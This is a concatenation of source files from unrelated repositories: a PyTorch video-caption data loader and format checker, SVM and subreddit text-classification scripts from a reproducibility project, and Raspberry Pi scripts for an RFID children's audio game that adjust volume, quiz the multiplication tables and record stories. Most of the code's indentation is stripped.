(options, args) = parser.parse_args(argv)
if len(args) < 4:
parser.print_help()
return 1
return process(options, args[0], args[1], args[2], args[3])
if __name__ == '__main__':
sys.exit(main())
```
#### File: Design_Project/util/data_provider.py
```python
import torch
import torch.utils.data as data
import numpy as np
import json as jsonmod
from basic.util import getVideoId
from vocab import clean_str
import pickle
import os
import torch._utils
import torch
import io
#Tempuckey starts============================
try:
torch._utils._rebuild_tensor_v2
except AttributeError:
def _rebuild_tensor_v2(storage, storage_offset, size, stride, requires_grad, backward_hooks):
tensor = torch._utils._rebuild_tensor(storage, storage_offset, size, stride)
tensor.requires_grad = requires_grad
tensor._backward_hooks = backward_hooks
return tensor
torch._utils._rebuild_tensor_v2 = _rebuild_tensor_v2
SAVE_PATH = '.\\feature\\'
SSP = '/usr/local/extstore01/zhouhan/Tempuckey/feature_somewhere'
VIDEO_MAX_LEN = 100
#Tempuckey ends============================
#VIDEO_MAX_LEN=64
def read_video_ids(cap_file):
video_ids_list = []
with open(cap_file, 'r') as cap_reader:
for line in cap_reader.readlines():
if len(line.strip().split(' ')) < 2:
continue
cap_id, caption = line.strip().split(' ', 1)
video_id = getVideoId(cap_id)
if video_id not in video_ids_list:
video_ids_list.append(video_id)
return video_ids_list
def collate_frame_gru_fn(data):
"""
Build mini-batch tensors from a list of (video, caption) tuples.
"""
# Sort a data list by caption length
if data[0][1] is not None:
data.sort(key=lambda x: len(x[1]), reverse=True)
videos, captions, cap_bows, idxs, cap_ids, video_ids = zip(*data)
# Merge videos (convert tuple of 1D tensor to 4D tensor)
video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos]
frame_vec_len = len(videos[0][0])
vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len)
videos_origin = torch.zeros(len(videos), frame_vec_len)
vidoes_mask = torch.zeros(len(videos), max(video_lengths))
for i, frames in enumerate(videos):
end = video_lengths[i]
vidoes[i, :end, :] = frames[:end,:]
videos_origin[i,:] = torch.mean(frames,0)
vidoes_mask[i,:end] = 1.0
if captions[0] is not None:
# Merge captions (convert tuple of 1D tensor to 2D tensor)
lengths = [len(cap) for cap in captions]
target = torch.zeros(len(captions), max(lengths)).long()
words_mask = torch.zeros(len(captions), max(lengths))
for i, cap in enumerate(captions):
end = lengths[i]
target[i, :end] = cap[:end]
words_mask[i, :end] = 1.0
else:
target = None
lengths = None
words_mask = None
cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None
video_data = (vidoes, videos_origin, video_lengths, vidoes_mask)
text_data = (target, cap_bows, lengths, words_mask)
return video_data, text_data, idxs, cap_ids, video_ids
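# --- Illustrative note (not part of the original repo) ---
# collate_frame_gru_fn pads a batch to (batch, max_frames, frame_dim) for video and
# (batch, max_words) for text, with 0/1 masks marking the valid positions. A
# hypothetical shape check over its two return packs:
def _demo_collate_shapes(video_data, text_data):
    videos, videos_origin, video_lengths, videos_mask = video_data
    target, cap_bows, lengths, words_mask = text_data
    assert videos.shape[0] == videos_mask.shape[0] == len(video_lengths)
    return videos.shape, (None if target is None else target.shape)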
def collate_frame(data):
videos, idxs, video_ids = zip(*data)
# Merge videos (convert tuple of 1D tensor to 4D tensor)
video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos]
frame_vec_len = len(videos[0][0])
vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len)
videos_origin = torch.zeros(len(videos), frame_vec_len)
vidoes_mask = torch.zeros(len(videos), max(video_lengths))
for i, frames in enumerate(videos):
end = video_lengths[i]
vidoes[i, :end, :] = frames[:end,:]
videos_origin[i,:] = torch.mean(frames,0)
vidoes_mask[i,:end] = 1.0
video_data = (vidoes, videos_origin, video_lengths, vidoes_mask)
return video_data, idxs, video_ids
def collate_text(data):
if data[0][0] is not None:
data.sort(key=lambda x: len(x[0]), reverse=True)
captions, cap_bows, idxs, cap_ids = zip(*data)
if captions[0] is not None:
# Merge captions (convert tuple of 1D tensor to 2D tensor)
lengths = [len(cap) for cap in captions]
target = torch.zeros(len(captions), max(lengths)).long()
words_mask = torch.zeros(len(captions), max(lengths))
for i, cap in enumerate(captions):
end = lengths[i]
target[i, :end] = cap[:end]
words_mask[i, :end] = 1.0
else:
target = None
lengths = None
words_mask = None
cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None
text_data = (target, cap_bows, lengths, words_mask)
return text_data, idxs, cap_ids
class Dataset4DualEncoding(data.Dataset):
"""
Load captions and video frame features by pre-trained CNN model.
"""
def __init__(self, cap_file, visual_feat, bow2vec, vocab, n_caption=None, video2frames=None):
# Captions
self.captions = {}
self.cap_ids = []
self.video_ids = set()
self.video2frames = video2frames
with open(cap_file, 'r') as cap_reader:
for line in cap_reader.readlines():
if len(line.strip().split(' ')) < 2:
continue
cap_id, caption = line.strip().split(' ', 1)
video_id = getVideoId(cap_id)
self.captions[cap_id] = caption
self.cap_ids.append(cap_id)
self.video_ids.add(video_id)
self.visual_feat = visual_feat
self.bow2vec = bow2vec
self.vocab = vocab
self.length = len(self.cap_ids)
# if n_caption is not None:
# assert len(self.video_ids) * n_caption == self.length, "%d != %d" % (len(self.video_ids) * n_caption, self.length)
def __getitem__(self, index):
cap_id = self.cap_ids[index]
video_id = getVideoId(cap_id)
# video
frame_list = self.video2frames[video_id]
frame_vecs = []
for frame_id in frame_list:
frame_vecs.append(self.visual_feat.read_one(frame_id))
frames_tensor = torch.Tensor(frame_vecs)
# text
caption = self.captions[cap_id]
if self.bow2vec is not None:
cap_bow = self.bow2vec.mapping(caption)
if cap_bow is None:
cap_bow = torch.zeros(self.bow2vec.ndims)
else:
cap_bow = torch.Tensor(cap_bow)
else:
cap_bow = None
if self.vocab is not None:
tokens = clean_str(caption)
caption = []
caption.append(self.vocab('<start>'))
caption.extend([self.vocab(token) for token in tokens])
caption.append(self.vocab('<end>'))
cap_tensor = torch.Tensor(caption)
else:
cap_tensor = None
return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id
def __len__(self):
return self.length
class VisDataSet4DualEncoding(data.Dataset):
"""
Load video frame features by pre-trained CNN model.
"""
def __init__(self, visual_feat, video2frames=None, video_ids=None):
self.visual_feat = visual_feat
self.video2frames = video2frames
if video_ids is None:
self.video_ids = video2frames.keys()
else:
self.video_ids = video_ids
self.length = len(self.video_ids)
def __getitem__(self, index):
video_id = self.video_ids[index]
frame_list = self.video2frames[video_id]
frame_vecs = []
for frame_id in frame_list:
frame_vecs.append(self.visual_feat.read_one(frame_id))
frames_tensor = torch.Tensor(frame_vecs)
return frames_tensor, index, video_id
def __len__(self):
return self.length
class TxtDataSet4DualEncoding(data.Dataset):
"""
Load captions
"""
def __init__(self, cap_file, bow2vec, vocab):
# Captions
self.captions = {}
self.cap_ids = []
with open(cap_file, 'r') as cap_reader:
for line in cap_reader.readlines():
if len(line.strip().split(' ')) < 2:
continue
cap_id, caption = line.strip().split(' ', 1)
self.captions[cap_id] = caption
self.cap_ids.append(cap_id)
self.bow2vec = bow2vec
self.vocab = vocab
self.length = len(self.cap_ids)
def __getitem__(self, index):
cap_id = self.cap_ids[index]
caption = self.captions[cap_id]
if self.bow2vec is not None:
cap_bow = self.bow2vec.mapping(caption)
if cap_bow is None:
cap_bow = torch.zeros(self.bow2vec.ndims)
else:
cap_bow = torch.Tensor(cap_bow)
else:
cap_bow = None
if self.vocab is not None:
tokens = clean_str(caption)
caption = []
caption.append(self.vocab('<start>'))
caption.extend([self.vocab(token) for token in tokens])
caption.append(self.vocab('<end>'))
cap_tensor = torch.Tensor(caption)
else:
cap_tensor = None
return cap_tensor, cap_bow, index, cap_id
def __len__(self):
return self.length
def get_data_loaders(cap_files, visual_feats, vocab, bow2vec, batch_size=100, num_workers=1, n_caption=2, video2frames=None, padding_size=0):
"""
Returns torch.utils.data.DataLoader for train and validation datasets
Args:
cap_files: caption files (dict) keys: [train, val]
visual_feats: image feats (dict) keys: [train, val]
"""
dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train']),
'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']) }
data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x],
batch_size=batch_size,
shuffle=(x=='train'),
pin_memory=True,
num_workers=num_workers,
collate_fn=collate_frame_gru_fn)
for x in cap_files }
return data_loaders
def get_train_data_loaders(cap_files, visual_feats, vocab, bow2vec, batch_size=100, num_workers=1, n_caption=2, video2frames=None):
"""
Returns torch.utils.data.DataLoader for train and validation datasets
Args:
cap_files: caption files (dict) keys: [train, val]
visual_feats: image feats (dict) keys: [train, val]
"""
dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train'])}
data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x],
batch_size=batch_size,
shuffle=(x=='train'),
pin_memory=True,
num_workers=num_workers,
collate_fn=collate_frame_gru_fn)
for x in cap_files if x=='train' }
return data_loaders
def get_test_data_loaders(cap_files, visual_feats, vocab, bow2vec, batch_size=100, num_workers=1, n_caption=2, video2frames = None):
"""
Returns torch.utils.data.DataLoader for test dataset
Args:
cap_files: caption files (dict) keys: [test]
visual_feats: image feats (dict) keys: [test]
"""
dset = {'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames = video2frames['test'])}
data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x],
batch_size=batch_size,
shuffle=False,
pin_memory=True,
num_workers=num_workers,
collate_fn=collate_frame_gru_fn)
for x in cap_files }
return data_loaders
def get_vis_data_loader(vis_feat, batch_size=100, num_workers=1, video2frames=None, video_ids=None):
dset = VisDataSet4DualEncoding(vis_feat, video2frames, video_ids=video_ids)
data_loader = torch.utils.data.DataLoader(dataset=dset,
batch_size=batch_size,
shuffle=False,
pin_memory=True,
num_workers=num_workers,
collate_fn=collate_frame)
return data_loader
def get_txt_data_loader(cap_file, vocab, bow2vec, batch_size=100, num_workers=1):
dset = TxtDataSet4DualEncoding(cap_file, bow2vec, vocab)
data_loader = torch.utils.data.DataLoader(dataset=dset,
batch_size=batch_size,
shuffle=False,
pin_memory=True,
num_workers=num_workers,
collate_fn=collate_text)
return data_loader
#Tempuckey starts============================
def collate(data):
# Sort a data list by caption length
# if data[0][1] is not None:
# data.sort(key=lambda x: len(x[1]), reverse=True)
# videos, captions, cap_bows, idxs, cap_ids, video_ids = zip(*data)
videos, video_infos, captions, caption_lengths = zip(*data)
# Merge videos (convert tuple of 1D tensor to 4D tensor)
frame_vec_len = len(videos[0][0][0])
video_lengths = [min(VIDEO_MAX_LEN, len(frame)) for frame in videos]
video_datas = torch.zeros(len(videos), max(video_lengths), frame_vec_len)
video_means = torch.zeros(len(videos), frame_vec_len)
video_masks = torch.zeros(len(videos), max(video_lengths))
video_names = [info['video_name'] for info in video_infos]
for i, video in enumerate(videos):
end = video_lengths[i]
video = [v[0] for v in video]
video = torch.stack(video)
video_datas[i, :end, :] = video[:end, :]
video_means[i, :] = torch.mean(video, 0)
video_masks[i, :end] = 1.0
# Merge captions (convert tuple of 1D tensor to 2D tensor)
cap_lengths = [len(cap) for cap in captions]
cap_datas = torch.zeros(len(captions), max(cap_lengths)).long()
cap_masks = torch.zeros(len(captions), max(cap_lengths))
for i, cap in enumerate(captions):
end = cap_lengths[i]
cap_datas[i, :end] = cap[:end]
cap_masks[i, :end] = 1.0
#cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None
#TODO: bow2vec
cap_bows = None
video_data_pack = (video_datas,
video_means,
video_lengths,
video_masks,
video_names)
text_data_pack = (cap_datas,
cap_bows,
cap_lengths,
cap_masks)
return video_data_pack, text_data_pack
"""
A class to solve unpickling issues
"""
class CPU_Unpickler(pickle.Unpickler,object):
def find_class(self, module, name):
if module == 'torch.storage' and name == '_load_from_bytes':
return lambda b: torch.load(io.BytesIO(b), map_location='cpu')
else: return super(CPU_Unpickler,self).find_class(module, name)
print (type(CPU_Unpickler))
class TempuckeyDataSet(data.Dataset):
def __init__(self, read_path=SSP):
self.read_path = read_path
_, _, self.file_pool = next(os.walk(read_path))
self.length = len(self.file_pool)
print('Initializing TempuckeyDataSet...')
print('Read path: %s' % self.read_path)
print('Found %d files in the path.' % self.length)
def __getitem__(self, index):
file_path = os.path.join(self.read_path, self.file_pool[index])
with open(file_path, 'rb') as f:
file = CPU_Unpickler(f).load()
video = file['feature']
video_info = file['video_info']
caption = (file['captions'])
caption_length = np.count_nonzero(caption == 1.0)
return video, video_info, caption, caption_length
def __len__(self):
return self.length
def get_tempuckey_data_loader(batch_size=10, num_workers=1):
"""
Returns torch.utils.data.DataLoader for train and validation datasets
Args:
cap_files: caption files (dict) keys: [train, val]
visual_feats: image feats (dict) keys: [train, val]
:param num_workers:
:param batch_size:
"""
data_loader = torch.utils.data.DataLoader(dataset=TempuckeyDataSet(),
batch_size=batch_size,
shuffle=True,
pin_memory=True,
num_workers=num_workers,
collate_fn=collate)
return data_loader
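# --- Illustrative usage sketch (not part of the original repo) ---
# Iterating the Tempuckey loader; this assumes the pickled feature files exist under
# SSP, so it is written as a function rather than executed at import time.
def _demo_tempuckey_loader():
    loader = get_tempuckey_data_loader(batch_size=4, num_workers=0)
    for video_pack, text_pack in loader:
        video_datas, video_means, video_lengths, video_masks, video_names = video_pack
        cap_datas, cap_bows, cap_lengths, cap_masks = text_pack
        return video_datas.shape, cap_datas.shape  # inspect only the first batch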
#Tempuckey ends============================
if __name__ == '__main__':
pass
```
#### File: Design_Project/util/format_check.py
```python
import os
import sys
from basic.constant import ROOT_PATH
def process(opt):
rootpath = opt.rootpath
collection = opt.collection
feature = opt.feature
flag=0
feat_dir = os.path.join(rootpath, collection, 'FeatureData', feature)
if not os.path.exists(os.path.join(feat_dir, 'feature.bin')):
print("file %s does not exist" % os.path.join(feat_dir, 'feature.bin'))
flag=1
if not os.path.exists(os.path.join(feat_dir, 'id.txt')):
print("file %s does not exist" % os.path.join(feat_dir, 'id.txt'))
flag=1
if not os.path.exists(os.path.join(feat_dir, 'shape.txt')):
print("file %s does not exist" % os.path.join(feat_dir, 'shape.txt'))
flag=1
textfile = os.path.join(rootpath, collection, 'TextData', '%s.caption.txt' % collection)
if not os.path.exists(textfile):
print("file %s does not exist" % textfile)
flag=1
if flag == 0:
print("%s format check passed!" % collection)
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
from optparse import OptionParser
parser = OptionParser(usage="""usage: %prog [options]""")
parser.add_option("--rootpath", default=ROOT_PATH, type="string", help="rootpath (default: %s)" % ROOT_PATH)
parser.add_option("--collection", default="", type="string", help="collection name")
parser.add_option("--feature", default="", type="string", help="feature name")
(options, args) = parser.parse_args(argv)
return process(options)
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "JimShu716/NeurIPS-2019-Reproducibility-Challenge",
"score": 3
} |
#### File: JimShu716/NeurIPS-2019-Reproducibility-Challenge/dataprocess.py
```python
import pandas as pd
import numpy as np
import math
import csv
from sklearn.svm import SVC
from sklearn.metrics import classification_report, confusion_matrix
get_name = 'cancer.DATA'
gen_name = 'cancer_raw'
dp = np.genfromtxt('./raw data/'+get_name,delimiter='\t')
test_size = 60
xtrain = pd.DataFrame(dp[test_size: ,:-1])
xtest = pd.DataFrame(dp[:test_size ,:-1])
ytrain = pd.DataFrame(dp[test_size: ,-1 ])
ytest = pd.DataFrame(dp[:test_size ,-1 ])
xtrain .to_csv('./raw data/'+gen_name+'.csv' ,sep=',',index=False,header=False)
xtest .to_csv('./raw data/'+gen_name+'_test.csv' ,sep=',',index=False,header=False)
ytrain .to_csv('./raw data/'+gen_name+'_label.csv' ,sep=',',index=False,header=False)
ytest .to_csv('./raw data/'+gen_name+'_label_test.csv' ,sep=',',index=False,header=False)
def acc(y_test,y_pred):
return "-----Accuracy: "+str((y_test==y_pred).sum()/len(y_test))
def runsvmpred(data_name):
X_train = np.genfromtxt('./raw data/'+data_name+'.csv' ,delimiter=',')
y_train = np.genfromtxt('./raw data/'+data_name+'_label.csv' ,delimiter=',')
X_test = np.genfromtxt('./raw data/'+data_name+'_test.csv' ,delimiter=',')
y_test = np.genfromtxt('./raw data/'+data_name+'_label_test.csv',delimiter=',')
svclassifier = SVC(kernel='linear')
svclassifier.fit(X_train, y_train)
y_pred = svclassifier.predict(X_test)
#print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
print(acc(y_test,y_pred))
runsvmpred('iris_raw')
```
#### File: JimShu716/NeurIPS-2019-Reproducibility-Challenge/nlp_kernel.py
```python
from sklearn.pipeline import Pipeline
import time
import csv
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import string
from tqdm import tqdm
from numpy import transpose as T
from scipy.stats import stats
from scipy.stats import mode
from sklearn.model_selection import cross_validate
from nltk.stem import WordNetLemmatizer
from nltk import word_tokenize
import re
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
#import models
from sklearn.svm import LinearSVC
def encode_subreddit(argument):
switch = {
"europe":0,
"canada":1,
}
return switch.get(argument,2)
def averageAcc(cv_results,fold):
average = 0
for number in cv_results:
average+=number
average /= fold
print("Cross-validate",fold,"folds accuracy is:",average)
return average
def accuracy(predicted,true_outcome,num):
accuracy = 0
index = 0
for result in predicted:
if result == true_outcome[index]:
accuracy+=1
index+=1
print("-----Accuracy:", accuracy/num)
class LemmaTokenizer(object):
def __init__(self):
self.wnl = WordNetLemmatizer()
def __call__(self, articles):
return [self.wnl.lemmatize(t) for t in re.split('\d|\\\|\s|[,.;:?!]|[/()]|\*',articles)]
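# --- Illustrative sketch (not part of the original script) ---
# The tokenizer above is meant to be handed to CountVectorizer, e.g.
# CountVectorizer(tokenizer=LemmaTokenizer()). A hypothetical quick check of its
# behaviour (requires nltk's wordnet data to be downloaded):
def _demo_tokenizer():
    tokens = LemmaTokenizer()('Dogs were running, 3 cats slept.')
    return [t for t in tokens if t]  # drop the empty strings produced by re.split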
start_time = time.time()
#load file
#------------------------------------------------------------------------------
canada_df = pd.read_csv(r'../data/parsed_data/canada.csv')
europe_df = pd.read_csv(r'../data/parsed_data/europe.csv')
training_df = canada_df.append(europe_df)
finish_time = time.time()
print("-----File Loaded in {} sec".format(finish_time - start_time))
encode = []
for subreddit in training_df['subreddits']:
encode.append(encode_subreddit(subreddit))
training_df['subreddit_encoding'] = encode
#training_df.to_csv(r'../data/encoded_reddit_train.csv',',')
# 6.1 SVM
#------------------------------------------------------------------------------
svm_train_clf= Pipeline([
('vect',CountVectorizer(binary = True)),
('tfidf',TfidfTransformer()),
('clf', LinearSVC(C = 0.2)),
])
#Cross-validation
#------------------------------------------------------------------------------
svm_cv_results = cross_validate(svm_train_clf,training_df['comments'],training_df['subreddit_encoding'],cv = 7)
sorted(svm_cv_results.keys())
svm_cv_results['fit_time']
svm_cv_results['test_score']
print("SVM")
averageAcc(svm_cv_results['test_score'],7)
``` |
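The script above only cross-validates the pipeline; it never fits it on the full training set. A minimal sketch of how the same `svm_train_clf` pipeline could be fit and then used to label new comments (the comment strings below are made up, and the sketch assumes the script above has already run so `svm_train_clf` and `training_df` are in scope):

```python
# Sketch only: assumes svm_train_clf and training_df from nlp_kernel.py are available.
svm_train_clf.fit(training_df['comments'], training_df['subreddit_encoding'])

new_comments = ["Toronto housing prices keep climbing",        # made-up examples
                "The EU parliament passed a new regulation"]
predictions = svm_train_clf.predict(new_comments)
print(predictions)  # encoded subreddits, e.g. array([1, 0]) -> canada, europe
```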
{
"source": "jimsio/hoorch",
"score": 2
} |
#### File: jimsio/hoorch/adjust_volume.py
```python
import RPi.GPIO as GPIO
import os
import time
import subprocess
from shlex import split
print("starting adjust volume")
#set start value of audio output
#os.system("amixer -q -c 0 sset 'Headphone',0 82%") #=48 in alsamixer
os.system("amixer -q -c 0 sset 'Headphone',0 96%") #=85 in alsamixer - for redamp
vol_up_pin = 36 # volume up
vol_down_pin = 38 # volume down
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BOARD)
#new hoorch v4 mic+amp
#GPIO.setmode(GPIO.BCM)
#vol_up_pin = 2
#vol_down_pin = 3
GPIO.setup(vol_up_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(vol_down_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
cmd = "amixer -c 0 sget 'Headphone',0"
cmd = split(cmd)
def volume_up(pin):
get_volume = subprocess.run(cmd, stdout=subprocess.PIPE).stdout.decode('utf-8')
position = get_volume.find("%")
cv = int(get_volume[position-2:position].replace("[", ""))
print(cv)
#if cv <= 82:
if cv <= 96: # for redamp
print("volume up")
os.system("amixer -q -c 0 sset 'Headphone',0 5db+")
def volume_down(pin):
print("volume down")
os.system("amixer -q -c 0 sset 'Headphone',0 5db-")
GPIO.add_event_detect(vol_up_pin, GPIO.FALLING, callback=volume_up, bouncetime = 400)
GPIO.add_event_detect(vol_down_pin, GPIO.FALLING, callback=volume_down, bouncetime = 400)
while True:
# sleep instead of a busy "continue" so the idle loop does not peg a CPU core;
# the volume callbacks are fired by GPIO edge detection, not by this loop
time.sleep(1)
```
#### File: jimsio/hoorch/einmaleins.py
```python
import audio
import time
import rfidreaders
import leds
import random
import copy
import threading
import re
import sys
defined_figures = rfidreaders.gamer_figures
#end_timer = None
'''def check_end():
if "ENDE" in rfidreaders.tags:
print("sys.exit")
end_timer.cancel()
sys.exit("End game")
end_timer = threading.Timer(0.3,check_end).start()
'''
def start():
#check_end()
audio.play_full("TTS",85) #We are now practising the multiplication tables.
leds.reset() #reset leds
audio.play_full("TTS",86) #Three figures can play. Place your figures on fields 1, 3 or 5, where the lights are on.
leds.led_value = [1,0,1,0,1,0]
audio.play_file("sounds","waiting.mp3") # play wait sound
time.sleep(6)
#check for figures on board, filter other tags
players = copy.deepcopy(rfidreaders.tags)
players[1] = None
players[3] = None
players[5] = None
for i,p in enumerate(players):
if p not in defined_figures:
players[i] = None
figure_count = sum(x is not None for x in players)
time.sleep(1)
if figure_count == 0:
audio.play_full("TTS",59) #You have not placed a game figure on the board.
return
audio.play_full("TTS",5+figure_count) # x figures are playing
if "ENDE" in rfidreaders.tags:
return
rounds = 3 # 1-5 rounds possible
audio.play_full("TTS",20+rounds) #We play 1-5 rounds
points = [0,0,0,0,0,0]
if "ENDE" in rfidreaders.tags:
return
isthefirst = True
for r in range(0,rounds):
#print(players)
for i,p in enumerate(players):
if p is not None:
leds.reset()
leds.led_value[i] = 100
if r == 0 and isthefirst == True: #first round
isthefirst = False
if figure_count > 1:
audio.play_full("TTS",12+i) #The figure on field x starts
audio.play_full("TTS",89) #Place the tens digit to the left of your figure and the units digit to the right, where the lights are on.
elif figure_count == 1:
audio.play_full("TTS",67) # It is your turn again
else:
audio.play_full("TTS",48+i) # The next figure is on field x
if "ENDE" in rfidreaders.tags:
return
num1 = random.randint(1,9)
num2 = random.randint(1,9)
solution = num1 * num2
audio.play_full("TTS",87) #How much is
audio.play_full("TTS",90+num1)
audio.play_full("TTS",88) #times
audio.play_full("TTS",90+num2)
ud = 0
#for unit digit
if i == 0:
ud = 5
else:
ud = i-1
#illuminate the led after and before the player field
leds.led_value[ud] = 100
leds.led_value[i+1] = 100
if "ENDE" in rfidreaders.tags:
return
audio.play_full("TTS",190) #You have 10 seconds to answer
#blink / wait for 10 seconds
#for b in range(1):
if r == 0: #only play in the first round
audio.play_file("sounds","waiting.mp3") # play wait sound 6 sec
#leds.rotate_one_round(1.11)
#leds blink at tens and unit fields
for k in range(5):
leds.led_value[i+1] = 0
leds.led_value[ud] = 100
time.sleep(1)
leds.led_value[ud] = 0
leds.led_value[i+1] = 100
time.sleep(1)
if "ENDE" in rfidreaders.tags:
return
tens = copy.deepcopy(rfidreaders.tags[i+1]) #tens digit
unit = copy.deepcopy(rfidreaders.tags[ud]) #units digit
if tens == None:
tens = "0"
#regex (start with capital character, zero or more characters, end with single digit) : ^[A-z]*[0-9]$
#search with regex if unit and tens look like Hahn1
if unit != None and re.search("^[A-z]*[0-9]$", unit) and re.search("^[A-z]*[0-9]$", tens):
#extract the digit from string (i.e. 1 from Hahn1)
tens_digit = int(tens[-1])*10
#old: tens_digit = int(tens)*10
#old: unit_digit = int(unit)
unit_digit = int(unit[-1])
if tens_digit+unit_digit == solution:
audio.play_full("TTS",27) # correct
#audio.play_file("sounds","winner.mp3")
time.sleep(0.5)
points[i] += 1
print("Du hast schon "+str(points[i])+" richtige Antworten")
else:
audio.play_full("TTS",26) # wrong
#audio.play_file("sounds","loser.mp3")
time.sleep(0.5)
else:
audio.play_full("TTS",191) #You did not place any numbers
if "ENDE" in rfidreaders.tags:
return
# tell the points
audio.play_full("TTS",80) #I will now read out the points
for i, p in enumerate(players):
if p is not None:
leds.reset()
leds.led_value[i] = 100
audio.play_full("TTS",74+i) #Figure on field 1,2...6
time.sleep(0.2)
print("Du hast "+str(points[i])+" Antworten richtig")
audio.play_full("TTS",68+points[i])
time.sleep(1)
if "ENDE" in rfidreaders.tags:
return
leds.reset()
```
#### File: jimsio/hoorch/geschichten_aufnehmen.py
```python
import audio
import time
import datetime
import rfidreaders
import leds
import os
import random
import copy
import subprocess
defined_figures = rfidreaders.gamer_figures
def start():
audio.play_full("TTS",55) #We will record a story for your figure
print("Wir nehmen eine Geschichte für deine Figur auf")
leds.reset() #reset leds
audio.play_full("TTS",5) #Place your figure on one of the fields
audio.play_file("sounds","waiting.mp3") # play wait sound
leds.rotate_one_round(1.11)
players = copy.deepcopy(rfidreaders.tags)
#check if player tag is predefined in defined_figures; otherwise (e.g. a raw numeric UID) it is an unknown tag and is dropped
for i,p in enumerate(players):
if p not in defined_figures:
players[i] = None
figure_count = sum(x is not None for x in players)
if figure_count == 0:
audio.play_full("TTS",59) #"You have not placed a game figure on the board."
return
time.sleep(1)
audio.play_full("TTS",5+figure_count) # x figures are playing
if "ENDE" in rfidreaders.tags:
return
start = True
for i, figure_id in enumerate(players):
leds.reset()
if figure_id is not None:
leds.led_value[i] = 100
new_recording = False
error_recording = False
if figure_count > 1:
if start: #at start
audio.play_full("TTS",12+i) #The figure on field x starts
start = False
else:
audio.play_full("TTS",47+i) # The next figure is on field x
if "ENDE" in rfidreaders.tags:
return
recordings_list = os.listdir("./data/figures/")
figure_dir = "./data/figures/"+figure_id
#when figure folder and i.e. roboter.mp3 exist
if figure_id in recordings_list and figure_id+'.mp3' in os.listdir(figure_dir):
audio.play_full("TTS",84) #This figure already has a story saved...
#files = os.listdir(figure_dir)
audio.play_story(figure_id)
#wait 60 seconds longer than recording otherwise continue to next figure - prevent program from freezing
waitingtime = time.time() + float(subprocess.run(['soxi','-D',figure_dir+'/'+figure_id+'.mp3'], stdout=subprocess.PIPE).stdout.decode('utf-8'))+60
while waitingtime > time.time():
if "JA" in rfidreaders.tags:
#if rfidreaders.tags[i] == "JA":
audio.kill_sounds()
audio.play_full("TTS",200) #Put your figure back on your field.
#rename old story
archived_file = figure_id+datetime.datetime.now().strftime("%Y-%m-%d-%H-%M")
os.rename(figure_dir+"/"+figure_id+".mp3",figure_dir+"/"+archived_file+".mp3")
audio.play_full("TTS",56) #Recording starts in 3 seconds! When you are finished, take your figure off the field
#leds.rotate_one_round(0.4)
audio.play_full("TTS",66) # 3 2 1 Go
leds.led_value[i] = 100
#most recent story has only figure_id as filename, record_story(figure_id)
audio.record_story(figure_id)
record_timer = time.time()+600 #600-second (10 min) counter until stop
while True:
if rfidreaders.tags[i] is None or record_timer < time.time() or "ENDE" in rfidreaders.tags:
error_recording = audio.stop_recording(figure_id)
audio.play_full("TTS",57) #Recording has ended
new_recording = True
break
break
#elif rfidreaders.tags[i] == "NEIN" or "ENDE" in rfidreaders.tags:
elif "NEIN" in rfidreaders.tags or "ENDE" in rfidreaders.tags:
audio.kill_sounds()
#new_recording = False
break
else:
print("no story recorded yet")
if figure_id not in recordings_list:
os.mkdir(figure_dir)
audio.play_full("TTS",56) #Recording starts in 3 seconds! When you are finished, take your figure off the field
#leds.rotate_one_round(0.4)
audio.play_full("TTS",66) # 3 2 1 Go
#time.sleep(1)
leds.led_value[i] = 100
#most recent story has only figure_id as filename, record_story(figure_id)
audio.record_story(figure_id)
record_timer = time.time()+600 #600-second (= 10 min) counter until stop
while True:
if rfidreaders.tags[i] is None or record_timer < time.time() or "ENDE" in rfidreaders.tags:
error_recording = audio.stop_recording(figure_id)
audio.play_full("TTS",57) #Recording has ended
new_recording = True
break
if new_recording:
if error_recording:
print("error while recording!")
audio.play_full("TTS",197) # An error occurred during the recording. Leave the figure in place longer next time
continue
#play audio after recording
audio.play_full("TTS",81) #I will now play back the recording. Use the Yes token to save it and the No token to discard it
audio.play_story(figure_id)
#wait 60 seconds longer than recording otherwise continue to next figure - prevent program from freezing
waitingtime = time.time() + float(subprocess.run(['soxi','-D',figure_dir+'/'+figure_id+'.mp3'], stdout=subprocess.PIPE).stdout.decode('utf-8'))+60
while waitingtime > time.time():
#if rfidreaders.tags[i] == "JA":
if "JA" in rfidreaders.tags:
audio.kill_sounds()
audio.play_full("TTS",82) #Story saved
break
elif "NEIN" in rfidreaders.tags or "ENDE" in rfidreaders.tags:
#elif rfidreaders.tags[i] == "NEIN" or "ENDE" in rfidreaders.tags:
audio.kill_sounds()
files_in_dir = os.listdir(figure_dir)
sorted_files = sorted(files_in_dir)
#print(sorted_files)
if len(files_in_dir) <= 1:
#delete file
os.remove(figure_dir+"/"+figure_id+".mp3")
#delete folder
os.rmdir(figure_dir)
else:
#delete file
os.remove(figure_dir+"/"+figure_id+".mp3")
#rename second file in folder to figure_id without timestamp
os.rename(figure_dir+"/"+sorted_files[-1],figure_dir+"/"+figure_id+".mp3")
audio.play_full("TTS",83) #Story not saved
break
```
